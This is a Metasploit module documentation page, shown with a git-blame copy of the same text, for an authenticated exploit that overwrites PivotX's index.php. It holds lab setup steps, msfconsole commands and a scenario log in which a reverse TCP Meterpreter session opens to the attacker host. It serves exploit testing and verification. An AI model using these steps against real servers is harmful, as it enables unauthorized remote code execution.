documentation/modules/exploit/linux/http/pivotx_index_php_overwrite.md

## Vulnerable Application

PivotX is free software to help you maintain dynamic sites such as weblogs, online journals and other frequently updated websites in general.
It's written in PHP and uses MySQL or flat files as a database.

Install steps:

1. Install Apache2, MySQL, PHP8.2+
1. `git clone https://github.com/pivotx/PivotX.git`
1. Move `PivotX` to webfolder
1. Run the following from the web folder `sudo chown -R www-data:www-data ./`

## Verification Steps

1. Install the application
1. Start msfconsole
1. Do: `use exploit/linux/http/pivotx_rce`
1. Do: `set USERNAME [PivotX username]`
1. Do: `set PASSWORD [PivotX password]`
1. Do: `set RHOSTS [target IP]`
1. Do: `set LHOST [attacker IP]`
1. Do: `run`

## Options
### USERNAME

PivotX username.

### PASSWORD

PivotX password.

## Scenarios

```
msf exploit(linux/http/pivotx_index_php_overwrite) > run verbose=true 
[*] Started reverse TCP handler on 192.168.168.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected PivotX 3.0.0.pre.rc3
[*] Logging in PivotX
[*] Modifying file and injecting payload
[*] Triggering payload
[*] Sending stage (40004 bytes) to 192.168.168.146
[*] Meterpreter session 1 opened (192.168.168.128:4444 -> 192.168.168.146:36104) at 2025-08-01 09:38:52 +0200

[*] Restoring original content

meterpreter > 
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 6.8.0-52-generic #53~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Jan 15 19:18:46 UTC 2 x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data

```
Module init 2025-07-21 12:41:38 +02:00			`## Vulnerable Application`

			`PivotX is free software to help you maintain dynamic sites such as weblogs, online journals and other frequently updated websites in general.`
			`It's written in PHP and uses MySQL or flat files as a database.`

			`Install steps:`

			`1. Install Apache2, MySQL, PHP8.2+`
			1. `git clone https://github.com/pivotx/PivotX.git`
			1. Move `PivotX` to webfolder
Addressing comments 2025-07-24 12:19:47 +02:00			1. Run the following from the web folder `sudo chown -R www-data:www-data ./`
Module init 2025-07-21 12:41:38 +02:00
			`## Verification Steps`

			`1. Install the application`
			`1. Start msfconsole`
			1. Do: `use exploit/linux/http/pivotx_rce`
			1. Do: `set USERNAME [PivotX username]`
			1. Do: `set PASSWORD [PivotX password]`
			1. Do: `set RHOSTS [target IP]`
			1. Do: `set LHOST [attacker IP]`
			1. Do: `run`

			`## Options`
			`### USERNAME`

			`PivotX username.`

			`### PASSWORD`

			`PivotX password.`

			`## Scenarios`

			```
Updates docs 2025-08-01 09:40:08 +02:00			`msf exploit(linux/http/pivotx_index_php_overwrite) > run verbose=true`
Module init 2025-07-21 12:41:38 +02:00			`[*] Started reverse TCP handler on 192.168.168.128:4444`
Updates docs 2025-08-01 09:40:08 +02:00			`[*] Running automatic check ("set AutoCheck false" to disable)`
			`[+] The target appears to be vulnerable. Detected PivotX 3.0.0.pre.rc3`
			`[*] Logging in PivotX`
			`[*] Modifying file and injecting payload`
			`[*] Triggering payload`
Module init 2025-07-21 12:41:38 +02:00			`[*] Sending stage (40004 bytes) to 192.168.168.146`
Updates docs 2025-08-01 09:40:08 +02:00			`[*] Meterpreter session 1 opened (192.168.168.128:4444 -> 192.168.168.146:36104) at 2025-08-01 09:38:52 +0200`

			`[*] Restoring original content`
Module init 2025-07-21 12:41:38 +02:00
Updates docs 2025-08-01 09:40:08 +02:00			`meterpreter >`
Module init 2025-07-21 12:41:38 +02:00			`meterpreter > sysinfo`
			`Computer : ubuntu`
			`OS : Linux ubuntu 6.8.0-52-generic #53~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Jan 15 19:18:46 UTC 2 x86_64`
			`Meterpreter : php/linux`
Updates docs 2025-08-01 09:40:08 +02:00			`meterpreter > getuid`
			`Server username: www-data`
Module init 2025-07-21 12:41:38 +02:00
			```